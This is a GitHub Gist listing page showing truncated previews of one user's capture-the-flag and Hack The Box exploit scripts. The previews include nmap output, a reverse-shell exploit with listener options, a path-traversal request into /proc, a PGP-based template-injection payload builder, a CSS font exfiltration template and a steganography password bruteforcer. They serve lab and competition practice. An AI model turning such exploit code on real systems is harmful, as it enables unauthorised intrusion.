Skip to content

Instantly share code, notes, and snippets.

@xl00t
xl00t / Sizzle.md
Last active October 27, 2023 16:21
Sizzle - HTB

Enumeration

- Nmap

kali@kali:/home/kali/Desktop/HTB/box/Sizzle $ nmap -p- -v -sVC -oA nmap/full 10.10.10.103
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
@xl00t
xl00t / exploit.py
Created October 23, 2023 04:56
Rusta Rhymes - Flag4All - Exploit
#!/usr/bin/env python3
"""Rusta Rhymes - Flag4All - Exploit
Usage:
exploit.py <url> <revshell_ip> <revshell_port> [--handler]
Options:
-h --help Show this screen.
--handler Automaticly setup a pwncat-cs handler on defined port

Gishadb - 481

16 Solves

Ce serveur écoute sur 2 ports ! 443 et 222. Trouvez un moyen d'obtenir le flag.
This server listen on two ports: 443 and 222. Find a way to get the flag.
https://gishadb.flag4all.sh

Auteur : Penthium2 (BZHack)
@xl00t
xl00t / solve.md
Created October 22, 2023 12:27
flag4all - SMUG
@xl00t
xl00t / pgp_ssti.py
Created June 19, 2023 00:16
Sandworm - Foothold
#!/usr/bin/env python3
import requests
import pgpy
from pgpy.constants import PubKeyAlgorithm, KeyFlags, HashAlgorithm, SymmetricKeyAlgorithm, CompressionAlgorithm
from urllib3.exceptions import InsecureRequestWarning
import base64
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def createPGPKeysPayload(ssti_payload):
@xl00t
xl00t / cracker.py
Created June 14, 2023 16:53
Stegsnow bruteforce script
#!/usr/bin/env python3
import subprocess
import threading
import sys
compressed = True
def try_password(threads_i, i, password, steg_file):
try:
print(' '*74+'\r'+f"[{i}] Thread {threads_i} try password : {password}", end='\r')
@xl00t
xl00t / exploi.py
Created June 5, 2023 16:57
PikaTwoo
#!/usr/bin/env python3
import sys, threading, requests
URL = f'http://pokatdex-api-v1.pokatmon-app.htb/admin/content/assets/add/hereadd'
cookie = {'SESSA0': 'a'}
# find nginx worker processes
r = requests.post(URL, data={'debug':1, 'region':'../../../../../proc/cpuinfo'}, cookies=cookie)
cpus = r.text.count('processor')
@xl00t
xl00t / exploit.py
Created June 1, 2023 08:33
FCSC 2022 | Web | Cloud Password Manager
charset = string.ascii_uppercase + string.digits
template = """
@font-face{
font-family: def;
src: url(/static/fonts/Georgia.ttf);
}
@font-face{
font-family: poc;
src: url(/static/fonts/GeorgiaBold.ttf);
@xl00t
xl00t / exp.py
Last active October 24, 2023 07:36
Fomat - HTB
#!/usr/bin/env python3
import requests
import string
import random
import sys
from urllib3.util import SKIP_HEADER
from collections import OrderedDict
import subprocess
from threading import Thread
import socket
@xl00t
xl00t / extract_reset_password_links.py
Created May 12, 2023 14:25
Snoopy HTB - First Stage